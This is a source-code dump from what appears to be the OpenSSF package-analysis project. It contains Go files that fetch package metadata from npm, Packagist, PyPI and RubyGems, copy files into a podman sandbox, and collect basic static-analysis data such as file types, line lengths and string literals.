44 | } 45 | 46 | return details.DistTags.Latest, nil 47 | } 48 | 49 | /* 50 | getNPMArchiveFilename generates a filename for a package archive to be downloaded from NPM. 51 | It is generated by replacing any '/' characters in the package name with '-' (ref [1]). 52 | Unlike in [1], the leading '@' is not stripped as '@' characters are allowed in filenames. 53 | The cleaned package name is then concatenated with "-", the version string and ".tgz". 54 | 55 | [1] https://github.com/npm/cli/blob/8ecbcb9a54b95541f35ebce55d60e4a1feac82c6/lib/commands/pack.js#L64 56 | */ 57 | func getNPMArchiveFilename(pkgName, version, _ string) string { 58 | cleanedName := strings.ReplaceAll(pkgName, "/", "-") 59 | return fmt.Sprintf("%s-%s.tgz", cleanedName, version) 60 | } 61 | 62 | func getNPMArchiveURL(pkgName, version string) (string, error) { 63 | resp, err := http.Get(fmt.Sprintf("https://registry.npmjs.org/%s/%s", pkgName, version)) 64 | if err != nil { 65 | return "", err 66 | } 67 | defer resp.Body.Close() 68 | 69 | responseBytes, err := io.ReadAll(resp.Body) 70 | if err != nil { 71 | return "", fmt.Errorf("error reading HTTP response: %w", err) 72 | } 73 | 74 | responseString := string(responseBytes) 75 | 76 | decoder := json.NewDecoder(strings.NewReader(responseString)) 77 | var packageInfo npmVersionJSON 78 | if err := decoder.Decode(&packageInfo); err != nil { 79 | // invalid version, non-existent package, etc. Details in responseString 80 | return "", fmt.Errorf("%w. NPM response: %s", err, responseString) 81 | } 82 | 83 | return packageInfo.Dist.Tarball, nil 84 | } 85 | 86 | var npmPkgManager = PkgManager{ 87 | ecosystem: pkgecosystem.NPM, 88 | latestVersion: getNPMLatest, 89 | archiveURL: getNPMArchiveURL, 90 | archiveFilename: getNPMArchiveFilename, 91 | extractArchive: utils.ExtractArchiveFile, 92 | } 93 | -------------------------------------------------------------------------------- /internal/pkgmanager/package.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 5 | ) 6 | 7 | type Pkg struct { 8 | name string 9 | version string 10 | manager *PkgManager 11 | local string 12 | } 13 | 14 | func (p *Pkg) Name() string { 15 | return p.name 16 | } 17 | 18 | func (p *Pkg) Version() string { 19 | return p.version 20 | } 21 | 22 | func (p *Pkg) Ecosystem() pkgecosystem.Ecosystem { 23 | return p.manager.ecosystem 24 | } 25 | 26 | func (p *Pkg) EcosystemName() string { 27 | return string(p.Ecosystem()) 28 | } 29 | 30 | func (p *Pkg) IsLocal() bool { 31 | return p.local != "" 32 | } 33 | 34 | func (p *Pkg) Manager() *PkgManager { 35 | return p.manager 36 | } 37 | 38 | func (p *Pkg) LocalPath() string { 39 | return p.local 40 | } 41 | -------------------------------------------------------------------------------- /internal/pkgmanager/packagist.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | "strings" 8 | "time" 9 | 10 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 11 | ) 12 | 13 | type packagistDistJSON struct { 14 | URL string `json:"url"` 15 | Type string `json:"type"` 16 | Shasum string `json:"shasum,omitempty"` 17 | Reference string `json:"reference"` 18 | } 19 | 20 | func (d *packagistDistJSON) UnmarshalJSON(data []byte) error { 21 | switch string(data) { 22 | case "null": 23 | return nil 24 | case `"__unset"`: 25 | return nil 26 | } 27 | type raw packagistDistJSON 28 | return json.Unmarshal(data, (*raw)(d)) 29 | } 30 | 31 | type packagistJSON struct { 32 | Packages map[string][]struct { 33 | Version string `json:"version"` 34 | VersionNormalized string `json:"version_normalized"` 35 | License []string `json:"license,omitempty"` 36 | Time time.Time `json:"time"` 37 | Name string `json:"name,omitempty"` 38 | Dist packagistDistJSON `json:"dist"` 39 | } `json:"packages"` 40 | } 41 | 42 | func getPackagistLatest(pkg string) (string, error) { 43 | resp, err := http.Get(fmt.Sprintf("https://repo.packagist.org/p2/%s.json", pkg)) 44 | if err != nil { 45 | return "", err 46 | } 47 | defer resp.Body.Close() 48 | 49 | decoder := json.NewDecoder(resp.Body) 50 | var details packagistJSON 51 | err = decoder.Decode(&details) 52 | if err != nil { 53 | return "", err 54 | } 55 | 56 | latestVersion := "" 57 | var lastTime time.Time 58 | for _, versions := range details.Packages { 59 | for _, v := range versions { 60 | if v.Time.Before(lastTime) { 61 | continue 62 | } 63 | lastTime = v.Time 64 | latestVersion = v.Version 65 | } 66 | } 67 | 68 | return latestVersion, nil 69 | } 70 | 71 | func getPackagistArchiveURL(pkgName, version string) (string, error) { 72 | resp, err := http.Get(fmt.Sprintf("https://repo.packagist.org/p2/%s.json", pkgName)) 73 | if err != nil { 74 | return "", err 75 | } 76 | defer resp.Body.Close() 77 | 78 | decoder := json.NewDecoder(resp.Body) 79 | var details packagistJSON 80 | err = decoder.Decode(&details) 81 | if err != nil { 82 | return "", err 83 | } 84 | 85 | for _, versions := range details.Packages { 86 | for _, v := range versions { 87 | if v.Version == version { 88 | return v.Dist.URL, nil 89 | } 90 | } 91 | } 92 | 93 | return "", nil 94 | } 95 | 96 | func getPackagistArchiveFilename(pkgName, version, _ string) string { 97 | pkg := strings.Split(pkgName, "/") 98 | return strings.Join([]string{pkg[0], "-", pkg[1], "-", version, ".zip"}, "") 99 | } 100 | 101 | var packagistPkgManager = PkgManager{ 102 | ecosystem: pkgecosystem.Packagist, 103 | latestVersion: getPackagistLatest, 104 | archiveURL: getPackagistArchiveURL, 105 | archiveFilename: getPackagistArchiveFilename, 106 | } 107 | -------------------------------------------------------------------------------- /internal/pkgmanager/pypi.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "io" 7 | "net/http" 8 | "strings" 9 | 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 12 | ) 13 | 14 | // pypiPackageInfoJSON represents relevant JSON data from the PyPI web API response 15 | // when package information is requested. The differences in response format between 16 | // (valid) requests made with a specific package version and with no package version 17 | // are not significant in our case. 18 | // (In particular, if the request contains a valid version, Urls contains a single entry 19 | // holding information for that package version. If the version is unspecified, Urls contains 20 | // an entry corresponding to each version of the package available on PyPI.) 21 | // See https://warehouse.pypa.io/api-reference/json.html and https://peps.python.org/pep-0691 22 | type pypiPackageInfoJSON struct { 23 | Info struct { 24 | Version string `json:"version"` 25 | } `json:"info"` 26 | URLs []struct { 27 | PackageType string `json:"packagetype"` 28 | URL string `json:"url"` 29 | } `json:"urls"` 30 | } 31 | 32 | func getPyPILatest(pkg string) (string, error) { 33 | resp, err := http.Get(fmt.Sprintf("https://pypi.org/pypi/%s/json", pkg)) 34 | if err != nil { 35 | return "", err 36 | } 37 | defer resp.Body.Close() 38 | 39 | decoder := json.NewDecoder(resp.Body) 40 | var details pypiPackageInfoJSON 41 | err = decoder.Decode(&details) 42 | if err != nil { 43 | return "", err 44 | } 45 | 46 | return details.Info.Version, nil 47 | } 48 | 49 | func getPyPIArchiveURL(pkgName, version string) (string, error) { 50 | resp, err := http.Get(fmt.Sprintf("https://pypi.org/pypi/%s/%s/json", pkgName, version)) 51 | if err != nil { 52 | return "", err 53 | } 54 | defer resp.Body.Close() 55 | 56 | responseBytes, err := io.ReadAll(resp.Body) 57 | if err != nil { 58 | return "", fmt.Errorf("error reading HTTP response: %w", err) 59 | } 60 | 61 | responseString := string(responseBytes) 62 | decoder := json.NewDecoder(strings.NewReader(responseString)) 63 | var packageInfo pypiPackageInfoJSON 64 | err = decoder.Decode(&packageInfo) 65 | if err != nil { 66 | // invalid version, non-existent package, etc. Details in responseString 67 | return "", fmt.Errorf("%w. PyPI response: %s", err, responseString) 68 | } 69 | 70 | // Need to find the archive with PackageType == "sdist" 71 | for _, url := range packageInfo.URLs { 72 | if url.PackageType == "sdist" { 73 | return url.URL, nil 74 | } 75 | } 76 | 77 | // Return an empty string and no error if we can't find an archive URL. 78 | return "", nil 79 | } 80 | 81 | var pypiPkgManager = PkgManager{ 82 | ecosystem: pkgecosystem.PyPI, 83 | latestVersion: getPyPILatest, 84 | archiveURL: getPyPIArchiveURL, 85 | archiveFilename: defaultArchiveFilename, 86 | extractArchive: utils.ExtractArchiveFile, 87 | } 88 | -------------------------------------------------------------------------------- /internal/pkgmanager/rubygems.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | 8 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 9 | ) 10 | 11 | type rubygemsJSON struct { 12 | Version string `json:"version"` 13 | } 14 | 15 | func getRubyGemsLatest(pkg string) (string, error) { 16 | resp, err := http.Get(fmt.Sprintf("https://rubygems.org/api/v1/gems/%s.json", pkg)) 17 | if err != nil { 18 | return "", err 19 | } 20 | defer resp.Body.Close() 21 | 22 | decoder := json.NewDecoder(resp.Body) 23 | var details rubygemsJSON 24 | err = decoder.Decode(&details) 25 | if err != nil { 26 | return "", err 27 | } 28 | 29 | return details.Version, nil 30 | } 31 | 32 | func getRubyGemsArchiveURL(pkgName, version string) (string, error) { 33 | pkgURL := fmt.Sprintf("https://rubygems.org/gems/%v-%v.gem", pkgName, version) 34 | resp, err := http.Get(pkgURL) 35 | if err != nil { 36 | return "", err 37 | } 38 | defer resp.Body.Close() 39 | 40 | return pkgURL, nil 41 | } 42 | 43 | var rubygemsPkgManager = PkgManager{ 44 | ecosystem: pkgecosystem.RubyGems, 45 | latestVersion: getRubyGemsLatest, 46 | archiveURL: getRubyGemsArchiveURL, 47 | archiveFilename: defaultArchiveFilename, 48 | } 49 | -------------------------------------------------------------------------------- /internal/resultstore/result.go: -------------------------------------------------------------------------------- 1 | package resultstore 2 | 3 | import "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 4 | 5 | // Pkg describes the various package details used to populate the package part 6 | // of the analysis results. 7 | type Pkg interface { 8 | Ecosystem() pkgecosystem.Ecosystem 9 | EcosystemName() string 10 | Name() string 11 | Version() string 12 | } 13 | -------------------------------------------------------------------------------- /internal/resultstore/resultstore_test.go: -------------------------------------------------------------------------------- 1 | package resultstore 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "os" 7 | "path" 8 | "path/filepath" 9 | "testing" 10 | ) 11 | 12 | func TestFileBucket(t *testing.T) { 13 | tmpDir := t.TempDir() 14 | 15 | testBucketURL := "file://" + tmpDir 16 | fmt.Println(testBucketURL) 17 | 18 | testKeys := []string{ 19 | "test1.txt", 20 | path.Join("testdir", "test2.txt"), // use path not filepath since it's a URL 21 | } 22 | 23 | ctx := context.Background() 24 | 25 | rs := New(testBucketURL) 26 | if rs == nil { 27 | t.Errorf("failed to open create resultstore with URL %s (invalid url)", testBucketURL) 28 | } 29 | 30 | bucket, err := rs.openBucket(ctx) 31 | if err != nil { 32 | t.Errorf("failed to open bucket: %v", err) 33 | } 34 | 35 | for _, key := range testKeys { 36 | t.Run(key, func(t *testing.T) { 37 | writer, err := bucket.NewWriter(ctx, key, nil) 38 | if err != nil { 39 | t.Errorf("failed to create writer: %v", err) 40 | } 41 | 42 | if _, err := writer.Write([]byte("test bytes")); err != nil { 43 | t.Errorf("failed to write to file: %v", err) 44 | } 45 | 46 | if err := writer.Close(); err != nil { 47 | t.Errorf("failed to close writer: %v", err) 48 | } 49 | 50 | if _, err := os.Stat(filepath.Join(tmpDir, key)); err != nil { 51 | t.Errorf("failed to stat file: %v", err) 52 | } 53 | 54 | }) 55 | } 56 | 57 | if err := bucket.Close(); err != nil { 58 | t.Errorf("failed to close bucket: %v", err) 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /internal/sandbox/copy_args.go: -------------------------------------------------------------------------------- 1 | package sandbox 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | ) 7 | 8 | // copySpec specifies the source and destination of a copy operation. 9 | // The copy may be made from the host into the sandbox or vice versa. 10 | // See https://docs.podman.io/en/latest/markdown/podman-cp.1.html for 11 | // semantics of src and dest paths. 12 | // srcInContainer and destInContainer specify whether the copy source 13 | // and destination are respectively in the host (false) or container (true) 14 | type copySpec struct { 15 | src string 16 | dest string 17 | srcInContainer bool 18 | destInContainer bool 19 | containerId string 20 | } 21 | 22 | func (c copySpec) Args() []string { 23 | copySrc := c.src 24 | if c.srcInContainer { 25 | copySrc = fmt.Sprintf("%s:%s", c.containerId, c.src) 26 | } 27 | 28 | copyDest := c.dest 29 | if c.destInContainer { 30 | copyDest = fmt.Sprintf("%s:%s", c.containerId, c.dest) 31 | } 32 | 33 | return []string{"cp", copySrc, copyDest} 34 | } 35 | 36 | func (c copySpec) String() string { 37 | return strings.Join(c.Args(), " ") 38 | } 39 | 40 | // hostToContainerCopyCmd generates the arguments to podman 41 | // that copy a file from the host to the container. 42 | func hostToContainerCopyCmd(hostPath, containerPath, containerId string) copySpec { 43 | return copySpec{hostPath, containerPath, false, true, containerId} 44 | } 45 | 46 | // hostToContainerCopyCmd generates the arguments to podman 47 | // that copy a file from the container to host. 48 | func containerToHostCopyCmd(hostPath, containerPath, containerId string) copySpec { 49 | return copySpec{containerPath, hostPath, true, false, containerId} 50 | } 51 | -------------------------------------------------------------------------------- /internal/sandbox/copy_args_test.go: -------------------------------------------------------------------------------- 1 | package sandbox 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | type copyCmdTestCase struct { 9 | name string 10 | hostPath string 11 | containerPath string 12 | containerId string 13 | want []string 14 | } 15 | 16 | func Test_containerToHostCopyCmdArgs(t *testing.T) { 17 | tests := []copyCmdTestCase{ 18 | { 19 | name: "simple relative path", 20 | hostPath: "path/in/host", 21 | containerPath: "path/in/container", 22 | containerId: "12345", 23 | want: []string{"cp", "12345:path/in/container", "path/in/host"}, 24 | }, 25 | { 26 | name: "simple absolute path", 27 | hostPath: "/dest/path/in/host", 28 | containerPath: "/src/path/in/container", 29 | containerId: "abcde", 30 | want: []string{"cp", "abcde:/src/path/in/container", "/dest/path/in/host"}, 31 | }, 32 | } 33 | for _, tt := range tests { 34 | t.Run(tt.name, func(t *testing.T) { 35 | got := containerToHostCopyCmd(tt.hostPath, tt.containerPath, tt.containerId).Args() 36 | if !reflect.DeepEqual(got, tt.want) { 37 | t.Errorf("containerToHostCopyCmd() = %v, want %v", got, tt.want) 38 | } 39 | }) 40 | } 41 | } 42 | 43 | func Test_hostToContainerCopyCmdArgs(t *testing.T) { 44 | tests := []copyCmdTestCase{ 45 | { 46 | name: "simple relative path", 47 | hostPath: "/src", 48 | containerPath: "/dest", 49 | containerId: "12345", 50 | want: []string{"cp", "/src", "12345:/dest"}, 51 | }, 52 | { 53 | name: "simple absolute path", 54 | hostPath: "/src/path/in/host", 55 | containerPath: "/dest/path/in/container", 56 | containerId: "abcde", 57 | want: []string{"cp", "/src/path/in/host", "abcde:/dest/path/in/container"}, 58 | }, 59 | } 60 | for _, tt := range tests { 61 | t.Run(tt.name, func(t *testing.T) { 62 | got := hostToContainerCopyCmd(tt.hostPath, tt.containerPath, tt.containerId).Args() 63 | if !reflect.DeepEqual(got, tt.want) { 64 | t.Errorf("hostToContainerCopyCmd() = %v, want %v", got, tt.want) 65 | } 66 | }) 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /internal/staticanalysis/basicdata/basic_data_test.go: -------------------------------------------------------------------------------- 1 | package basicdata 2 | 3 | import ( 4 | "context" 5 | "os" 6 | "path/filepath" 7 | "reflect" 8 | "testing" 9 | 10 | "github.com/ossf/package-analysis/internal/utils" 11 | "github.com/ossf/package-analysis/pkg/valuecounts" 12 | ) 13 | 14 | type testFile struct { 15 | filename string 16 | contents []byte 17 | contentsHash string 18 | fileType string 19 | lineLengths valuecounts.ValueCounts 20 | } 21 | 22 | var testFiles = []testFile{ 23 | { 24 | filename: "test1.txt", 25 | contents: []byte("hello test 1!\n"), 26 | contentsHash: "bd96959573979235b87180b0b7513c7f1d5cbf046b263f366f2f10fe1b966494", 27 | fileType: "ASCII text", 28 | lineLengths: valuecounts.Count([]int{13}), 29 | }, 30 | { 31 | filename: "test2.txt", 32 | contents: []byte("#! /bin/bash\necho 'Hello test 2'\n"), 33 | contentsHash: "6179db3c673ceddcdbd384116ae4d301d64e65fc2686db9ba64945677a5a893c", 34 | fileType: "Bourne-Again shell script, ASCII text executable", 35 | lineLengths: valuecounts.Count([]int{12, 19}), 36 | }, 37 | } 38 | 39 | func TestGetBasicData(t *testing.T) { 40 | tests := []struct { 41 | name string 42 | files []testFile 43 | wantErr bool 44 | }{ 45 | { 46 | name: "test no files", 47 | files: nil, 48 | wantErr: false, 49 | }, 50 | { 51 | name: "test one file", 52 | files: []testFile{testFiles[0]}, 53 | wantErr: false, 54 | }, 55 | { 56 | name: "test two files", 57 | files: []testFile{testFiles[0], testFiles[1]}, 58 | wantErr: false, 59 | }, 60 | } 61 | for _, tt := range tests { 62 | t.Run(tt.name, func(t *testing.T) { 63 | testDir := t.TempDir() 64 | paths := utils.Transform(tt.files, func(f testFile) string { 65 | return filepath.Join(testDir, f.filename) 66 | }) 67 | 68 | for i := range tt.files { 69 | if err := os.WriteFile(paths[i], tt.files[i].contents, 0o666); err != nil { 70 | t.Fatalf("failed to write test file %d: %v", i, err) 71 | } 72 | } 73 | 74 | got, err := Analyze(context.Background(), paths) 75 | if (err != nil) != tt.wantErr { 76 | t.Errorf("detectFileTypes() error = %v, wantErr %v", err, tt.wantErr) 77 | return 78 | } 79 | 80 | wantData := utils.Transform(tt.files, func(f testFile) FileData { 81 | return FileData{ 82 | DetectedType: f.fileType, 83 | Size: int64(len(f.contents)), 84 | SHA256: f.contentsHash, 85 | LineLengths: f.lineLengths, 86 | } 87 | }) 88 | 89 | if !reflect.DeepEqual(got, wantData) { 90 | t.Errorf("TestGetBasicData() data mismatch:\n"+ 91 | "== got == \n%v\n== want ==\n%v", got, wantData) 92 | } 93 | }) 94 | } 95 | } 96 | -------------------------------------------------------------------------------- /internal/staticanalysis/basicdata/describe_files.go: -------------------------------------------------------------------------------- 1 | package basicdata 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "log/slog" 7 | "os" 8 | "os/exec" 9 | "strings" 10 | 11 | "github.com/ossf/package-analysis/internal/staticanalysis/externalcmd" 12 | ) 13 | 14 | // fileCmdInputArgs describes how to pass file arguments to the `file` command. 15 | type fileCmdArgsHandler struct{} 16 | 17 | func (h fileCmdArgsHandler) SingleFileArg(filePath string) []string { 18 | return []string{filePath} 19 | } 20 | 21 | func (h fileCmdArgsHandler) FileListArg(fileListPath string) []string { 22 | return []string{"--files-from", fileListPath} 23 | } 24 | 25 | func (h fileCmdArgsHandler) ReadStdinArg() []string { 26 | // reads file list from standard input 27 | return h.FileListArg("-") 28 | } 29 | 30 | func detectFileTypes(ctx context.Context, paths []string) ([]string, error) { 31 | workingDir, err := os.MkdirTemp("", "package-analysis-basic-data-*") 32 | if err != nil { 33 | return nil, fmt.Errorf("error creating temp file: %w", err) 34 | } 35 | defer func() { 36 | if err := os.RemoveAll(workingDir); err != nil { 37 | slog.ErrorContext(ctx, "could not remove working directory", "path", workingDir, "error", err) 38 | } 39 | }() 40 | 41 | cmd := exec.CommandContext(ctx, "file", "--brief") 42 | input := externalcmd.MultipleFileInput(paths) 43 | 44 | if err := input.SendTo(cmd, fileCmdArgsHandler{}, workingDir); err != nil { 45 | return nil, fmt.Errorf("failed to prepare input: %w", err) 46 | } 47 | 48 | fileCmdOutput, err := cmd.Output() 49 | if err != nil { 50 | return nil, fmt.Errorf("error running file command: %w", err) 51 | } 52 | 53 | descriptionsString := strings.TrimSpace(string(fileCmdOutput)) 54 | if descriptionsString == "" { 55 | // no files input, probably 56 | return []string{}, nil 57 | } 58 | 59 | // command output is newline-separated list of file types, 60 | // with the order matching the input file list. 61 | return strings.Split(descriptionsString, "\n"), nil 62 | } 63 | -------------------------------------------------------------------------------- /internal/staticanalysis/linelengths/line_lengths.go: -------------------------------------------------------------------------------- 1 | package linelengths 2 | 3 | import ( 4 | "bufio" 5 | "io" 6 | "os" 7 | "strings" 8 | ) 9 | 10 | /* 11 | GetLineLengths counts the number of characters on each line of a file or string, 12 | returning a slice containing the length of each line in sequence. 13 | 14 | Lines are defined to be separated by newline ('\n') characters. If the newline 15 | character is preceded by a carriage return ('\r'), this will also be treated as 16 | part of the separator. 17 | 18 | If filePath is not empty, the function attempts to count the lines of the file 19 | at that path, otherwise lines in sourceString are counted. 20 | 21 | Note: there may not be much useful information to be gathered by distinguishing 22 | between line lengths when they get very long. It may be pragmatic to just report 23 | all lines above e.g. 64K as 64K long. 24 | */ 25 | func GetLineLengths(filePath string, sourceString string) ([]int, error) { 26 | var reader *bufio.Reader 27 | if len(filePath) > 0 { 28 | file, err := os.Open(filePath) 29 | if err != nil { 30 | return nil, err 31 | } 32 | defer file.Close() 33 | 34 | reader = bufio.NewReader(file) 35 | } else { 36 | reader = bufio.NewReader(strings.NewReader(sourceString)) 37 | } 38 | 39 | lengths := make([]int, 0) 40 | for { 41 | /* Normally bufio.Scanner would be more convenient to use here, however by default 42 | it uses a fixed maximum buffer size (MaxScanTokenSize = 64 * 1024). Since some 43 | (obfuscated) source code may contain very long lines, rather than doing our own 44 | buffer management we'll use reader.ReadStrings, which uses an internal function 45 | (collectFragments) to aggregate multiple full buffers. */ 46 | line, readErr := reader.ReadString('\n') 47 | if readErr != nil && readErr != io.EOF { 48 | return nil, readErr 49 | } 50 | 51 | // remove trailing newline and carriage return if present 52 | // (code adapted from bufio.ReadLine()) 53 | l := len(line) 54 | if l >= 1 { 55 | if line[l-1] == '\n' { 56 | drop := 1 57 | if l >= 2 && line[l-2] == '\r' { 58 | drop = 2 59 | } 60 | l -= drop 61 | } 62 | lengths = append(lengths, l) 63 | } 64 | 65 | if readErr == io.EOF { 66 | break 67 | } 68 | } 69 | 70 | if len(lengths) == 0 { 71 | // define the empty string to have a single empty line 72 | lengths = append(lengths, 0) 73 | } 74 | 75 | return lengths, nil 76 | } 77 | -------------------------------------------------------------------------------- /internal/staticanalysis/linelengths/line_lengths_test.go: -------------------------------------------------------------------------------- 1 | package linelengths 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestSourceStringLineLengths(t *testing.T) { 9 | tests := []struct { 10 | name string 11 | source string 12 | want []int 13 | wantErr bool 14 | }{ 15 | { 16 | name: "test simple multiline", 17 | source: ` 18 | One 19 | Two 20 | Three 21 | Four 22 | Five 23 | `, 24 | want: []int{0, 3, 3, 5, 4, 4}, 25 | wantErr: false, 26 | }, 27 | { 28 | name: "test simple single line", 29 | source: `One Two Three Four Five`, 30 | want: []int{23}, 31 | wantErr: false, 32 | }, 33 | { 34 | name: "test empty string", 35 | source: ``, 36 | want: []int{0}, 37 | wantErr: false, 38 | }, 39 | { 40 | name: "test single char", 41 | source: "a", 42 | want: []int{1}, 43 | wantErr: false, 44 | }, 45 | { 46 | name: "test empty newline", 47 | source: ` 48 | `, 49 | want: []int{0}, 50 | wantErr: false, 51 | }, 52 | 53 | { 54 | name: "test carriage return", 55 | source: "\r\n", 56 | want: []int{0}, 57 | wantErr: false, 58 | }, 59 | } 60 | for _, tt := range tests { 61 | t.Run(tt.name, func(t *testing.T) { 62 | got, err := GetLineLengths("", tt.source) 63 | if (err != nil) != tt.wantErr { 64 | t.Errorf("GetLineLengths() error = %v, wantErr %v", err, tt.wantErr) 65 | return 66 | } 67 | if !reflect.DeepEqual(got, tt.want) { 68 | t.Errorf("GetLineLengths() got = %v, want %v", got, tt.want) 69 | } 70 | }) 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/init_parser.go: -------------------------------------------------------------------------------- 1 | package parsing 2 | 3 | import ( 4 | "context" 5 | _ "embed" 6 | "fmt" 7 | "os" 8 | "os/exec" 9 | "path/filepath" 10 | 11 | "github.com/ossf/package-analysis/internal/utils" 12 | ) 13 | 14 | // babelParser holds the content of the parser script. 15 | // 16 | //go:embed babel-parser.js 17 | var babelParser []byte 18 | 19 | // packageJSON holds the content of the NPM package.json file, with information 20 | // about the dependencies for the parser 21 | // 22 | //go:embed package.json 23 | var packageJSON []byte 24 | 25 | // packageLockJSON holds the content of the NPM package-lock.json file, with 26 | // information about versions and hashes of dependencies for the parser 27 | // 28 | //go:embed package-lock.json 29 | var packageLockJSON []byte 30 | 31 | const ( 32 | parserFileName = "babel-parser.js" 33 | packageJSONFileName = "package.json" 34 | packageLockJSONFileName = "package-lock.json" 35 | ) 36 | 37 | // npmCacheDir is used to check for cached versions of NPM dependencies before 38 | // downloading them from a remote source. The directory is populated by the 39 | // Docker build for the container this code will run in. 40 | const npmCacheDir = "/npm_cache" 41 | 42 | type ParserConfig struct { 43 | InstallDir string 44 | ParserPath string 45 | } 46 | 47 | type parserFile struct { 48 | name string 49 | contents []byte 50 | isExecutable bool 51 | } 52 | 53 | var parserFiles = []parserFile{ 54 | {parserFileName, babelParser, false}, 55 | {packageJSONFileName, packageJSON, false}, 56 | {packageLockJSONFileName, packageLockJSON, false}, 57 | } 58 | 59 | func InitParser(ctx context.Context, installDir string) (ParserConfig, error) { 60 | if err := os.MkdirAll(installDir, 0o777); err != nil { 61 | return ParserConfig{}, fmt.Errorf("error creating JS parser directory: %w", err) 62 | } 63 | 64 | for _, file := range parserFiles { 65 | writePath := filepath.Join(installDir, file.name) 66 | if err := utils.WriteFile(writePath, file.contents, file.isExecutable); err != nil { 67 | return ParserConfig{}, fmt.Errorf("error writing %s to %s: %w", file.name, installDir, err) 68 | } 69 | } 70 | 71 | // run npm install in that folder 72 | npmArgs := []string{"ci", "--silent", "--no-progress", "--prefix", installDir} 73 | 74 | fileInfo, err := os.Stat(npmCacheDir) 75 | cacheDirAccessible := err == nil && fileInfo.IsDir() && (fileInfo.Mode().Perm()&0o700 == 0o700) 76 | if cacheDirAccessible { 77 | npmArgs = append(npmArgs, "--cache", npmCacheDir, "--prefer-offline") 78 | } 79 | 80 | cmd := exec.CommandContext(ctx, "npm", npmArgs...) 81 | if err := cmd.Run(); err != nil { 82 | return ParserConfig{}, fmt.Errorf("npm install error: %w", err) 83 | } 84 | 85 | return ParserConfig{ 86 | InstallDir: installDir, 87 | ParserPath: filepath.Join(installDir, parserFileName), 88 | }, nil 89 | } 90 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "package-analysis-js-parsing", 3 | "version": "1.0.0", 4 | "type": "module", 5 | "dependencies": { 6 | "@babel/parser": "^7.26.5", 7 | "@babel/traverse": "^7.26.5" 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/result.go: -------------------------------------------------------------------------------- 1 | package parsing 2 | 3 | import ( 4 | "fmt" 5 | "strings" 6 | 7 | "github.com/ossf/package-analysis/pkg/api/staticanalysis/token" 8 | ) 9 | 10 | // SingleResult holds processed information about source code tokens 11 | // found in a single file by a single language parser 12 | type SingleResult struct { 13 | Language Language `json:"language"` 14 | Identifiers []token.Identifier `json:"identifiers"` 15 | StringLiterals []token.String `json:"string_literals"` 16 | IntLiterals []token.Int `json:"int_literals"` 17 | FloatLiterals []token.Float `json:"float_literals"` 18 | Comments []token.Comment `json:"comments"` 19 | // future: external function calls / references (e.g. eval) 20 | } 21 | 22 | func (r SingleResult) String() string { 23 | parts := []string{ 24 | fmt.Sprintf("language: %s", r.Language), 25 | fmt.Sprintf("identifiers\n%v", r.Identifiers), 26 | fmt.Sprintf("string literals\n%v", r.StringLiterals), 27 | fmt.Sprintf("integer literals\n%v", r.IntLiterals), 28 | fmt.Sprintf("float literals\n%v", r.FloatLiterals), 29 | fmt.Sprintf("comments\n%v", r.Comments), 30 | } 31 | return strings.Join(parts, "\n") 32 | } 33 | -------------------------------------------------------------------------------- /internal/staticanalysis/parsing/string_regexp.go: -------------------------------------------------------------------------------- 1 | package parsing 2 | 3 | import ( 4 | "os" 5 | "regexp" 6 | 7 | "github.com/ossf/package-analysis/internal/utils" 8 | ) 9 | 10 | // General reference for matching string literals 11 | // https://blog.stevenlevithan.com/archives/match-quoted-string 12 | 13 | // https://stackoverflow.com/a/10786066 14 | var ( 15 | singleQuotedString = regexp.MustCompile(`'[^'\\]*(\\.[^'\\]*)*'`) 16 | doubleQuotedString = regexp.MustCompile(`"[^"\\]*(\\.[^"\\]*)*"`) 17 | backTickQuotedString = regexp.MustCompile("`[^`\\\\]*(\\\\.[^`\\\\]*)*`") 18 | ) 19 | 20 | // https://stackoverflow.com/a/30737232 21 | var ( 22 | singleQuotedString2 = regexp.MustCompile(`'(?:[^'\\]*(?:\\.)?)*'`) 23 | doubleQuotedString2 = regexp.MustCompile(`"(?:[^"\\]*(?:\\.)?)*"`) 24 | backTickQuotedString2 = regexp.MustCompile("`(?:[^`\\\\]*(?:\\\\.)?)*`") 25 | ) 26 | 27 | //goland:noinspection GoUnusedGlobalVariable 28 | var anyQuotedString = utils.CombineRegexp(singleQuotedString, doubleQuotedString, backTickQuotedString) 29 | 30 | //goland:noinspection GoUnusedGlobalVariable 31 | var anyQuotedString2 = utils.CombineRegexp(singleQuotedString2, doubleQuotedString2, backTickQuotedString2) 32 | 33 | type ExtractedStrings struct { 34 | RawLiterals []string 35 | Strings []string 36 | } 37 | 38 | func dequote(s string) string { 39 | if len(s) <= 2 { 40 | return "" 41 | } else { 42 | return s[1 : len(s)-1] 43 | } 44 | } 45 | 46 | func FindStringsInCode(source string, stringRegexp *regexp.Regexp) (*ExtractedStrings, error) { 47 | allStrings := stringRegexp.FindAllString(source, -1) 48 | if allStrings == nil { 49 | return &ExtractedStrings{Strings: []string{}, RawLiterals: []string{}}, nil 50 | } 51 | 52 | unquotedStrings := utils.Transform(allStrings, dequote) 53 | return &ExtractedStrings{Strings: unquotedStrings, RawLiterals: allStrings}, nil 54 | } 